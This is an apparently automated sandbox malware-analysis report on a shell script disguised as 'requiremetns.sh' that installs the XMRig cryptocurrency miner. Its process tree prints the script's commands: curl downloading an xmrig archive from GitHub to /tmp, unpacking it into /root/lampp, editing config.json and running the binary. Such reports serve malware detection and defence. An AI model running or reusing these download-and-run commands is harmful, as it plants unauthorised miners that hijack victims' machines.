xmrig | d97530313d2423ba8c3e87ccd3d66e6cd77997d26bbb4d1dd2a5f32827dde8cd

Analysis

max time kernel
32s
max time network
33s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
01/07/2024, 08:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

requiremetns.sh
Size

8KB
MD5

97423634cc1762b2f010cb860e7fb47d
SHA1

2f50775e8fe9ab98a80f06d835c5874091bf0b3e
SHA256

d97530313d2423ba8c3e87ccd3d66e6cd77997d26bbb4d1dd2a5f32827dde8cd
SHA512

bd5279178f713edaca1754937a859fa41dbec1fdd15c8ad3cb11894142e389d97bf3ca7f0402c018a616053b1121650ed609498a4b34c4def829e02924f6de1f
SSDEEP

192:fFa1ZIJvH8czpCyzdpB3f1SAij8E3YUNvmTC8KfbmP/oYv0Yd:fEHexC+HSAHE3YUN+TC8SbmQUfd

Score

10^/10

xmrig miner

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral5/files/fstream-2.dat	family_xmrig
behavioral5/files/fstream-2.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Executes dropped EXE 2 IoCs

ioc	pid	Process
/root/lampp/xmrig	841	xmrig
/root/lampp/xmrig	862	xmrig

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
1	raw.githubusercontent.com

Reads runtime system information 10 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/filesystems	mkdir
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/filesystems	sed

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/xmrig.tar.gz	curl
File opened for modification	/tmp/xmrig.tar.gz	curl

/tmp/requiremetns.sh
/tmp/requiremetns.sh
1⤵
PID:727
- /usr/bin/cut
  cut -f1 -d.
  2⤵
  PID:732
- /usr/bin/nproc
  nproc
  2⤵
  PID:738
- /usr/bin/curl
  curl -L --progress-bar https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.tar.gz -o /tmp/xmrig.tar.gz
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:742
- /bin/mkdir
  mkdir /root/lampp
  2⤵
  - Reads runtime system information
  PID:836
- /bin/tar
  tar xf /tmp/xmrig.tar.gz -C /root/lampp
  2⤵
  - Reads runtime system information
  PID:837
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:838
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:838
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:838
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:838
- - /sbin/gzip
    gzip -d
    3⤵
    PID:838
- - /bin/gzip
    gzip -d
    3⤵
    PID:838
- /bin/rm
  rm /tmp/xmrig.tar.gz
  2⤵
  PID:839
- /bin/sed
  sed -i "s/\"donate-level\": *[^,]*,/\"donate-level\": 1,/" /root/lampp/config.json
  2⤵
  - Reads runtime system information
  PID:840
- /root/lampp/xmrig
  /root/lampp/xmrig --help
  2⤵
  - Executes dropped EXE
  PID:841
- /bin/sed
  sed "s/\"//g"
  2⤵
  - Reads runtime system information
  PID:847
- /usr/bin/curl
  curl -s https://github.com/xmrig/xmrig/releases/latest
  2⤵
  - Reads runtime system information
  PID:845
- /bin/grep
  grep -o "\".*\""
  2⤵
  PID:846
- /usr/bin/curl
  curl -s
  2⤵
  - Reads runtime system information
  PID:853
- /bin/grep
  grep "xenial-x64.tar.gz\""
  2⤵
  PID:854
- /usr/bin/cut
  cut -d "\"" -f2
  2⤵
  PID:855
- /usr/bin/curl
  curl -L --progress-bar https://github.com -o /tmp/xmrig.tar.gz
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:856
- /bin/tar
  tar xf /tmp/xmrig.tar.gz -C /root/lampp "--strip=1"
  2⤵
  - Reads runtime system information
  PID:858
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:859
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:859
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:859
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:859
- - /sbin/gzip
    gzip -d
    3⤵
    PID:859
- - /bin/gzip
    gzip -d
    3⤵
    PID:859
- /bin/rm
  rm /tmp/xmrig.tar.gz
  2⤵
  PID:860
- /bin/sed
  sed -i "s/\"donate-level\": *[^,]*,/\"donate-level\": 0,/" /root/lampp/config.json
  2⤵
  - Reads runtime system information
  PID:861
- /root/lampp/xmrig
  /root/lampp/xmrig --help
  2⤵
  - Executes dropped EXE
  PID:862

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/lampp/config.json

Filesize
2KB

MD5
f3294129e6b76283965ad86a815bf383

SHA1
5fe0ab538f86962efe82cb13fc2da745610740af

SHA256
578386126ae451940ff5c21ce95b4e3be85c2d33160d6e739ed0ebbd206c7e81

SHA512
07a280be17282096ed8c319623d2e02e088e80d69e3d6d24ecaef5bedf624d006dc4963b8b1a6c0569a3c9221786bfd7cd462dddebcfcbed7879fd994b4c8333

Download Submit
/root/lampp/sedz4JkP7

Filesize
2KB

MD5
249b7abb9dc15cc1b1ca5ae8f998de56

SHA1
05251c97858f5a47deb3c12bb6b88d0499f4e6da

SHA256
dc4afb2c0aa3527f2d80259bea8756a969856d4cf209de9070f890745a40e607

SHA512
a591839687de92238bf4813caf730c203fa0d840549a1e1a7a3b07890cdfe02ba9ecd054bf6bfca5df627db61e75754f39e3ca09f6e1e3e0c2a762e12cad2f8f

Download Submit
/root/lampp/xmrig

Filesize
8.4MB

MD5
e6b2f9d13d45c128b44cb5405df9ab39

SHA1
c07326f69240e3d22d134d156528af3bd5d0497b

SHA256
96462c80ee4118a9140b159d5bbf5f3a40a8693d650919e29b23bd3c9c7e4162

SHA512
4eef70930aae075d38a871c380b2d1322c5a3cfdfdd6e936447e384bfd6c3f71b4ad7a9dc1dd2213a946f32681686f0db0b6f6e1caf1286a0a7fe36a26ac5632

Download Submit
/tmp/xmrig.tar.gz

Filesize
3.4MB

MD5
e003a3ec8bdd61151a61cadf950502c4

SHA1
2606bd45a8d45092c7d2c0ac9d6e92ec7ef7950e

SHA256
80b1dc6f56a95273420dc96e837d7e1a9f42c057e319dadac0cccee4425319e0

SHA512
ef80c71d8b0d09128abf9e67fe12a8cd843500419da43e7a284e016029391d826c503aeec3073a2b3d7d90ba24f18990edf6965cd38a270bbe57f20c6be022f9

Download Submit
/tmp/xmrig.tar.gz

Filesize
234KB

MD5
db91af961904802358f402051c987e12

SHA1
3944a6c7368e475cfe7741b6d514287b66056606

SHA256
a91a34843579620193e7213ced6330e6a9ea669a84819cee894190c0322b56f9

SHA512
a19e58b82b0f0dfaefa16eef7f3be487b0000cda0a0a54ef47eec54e3dc2808c2e79cdadf933839a4c22750f17c4c8055a832bd14eae2e0c12c5ebe6f22de8b7

Download Submit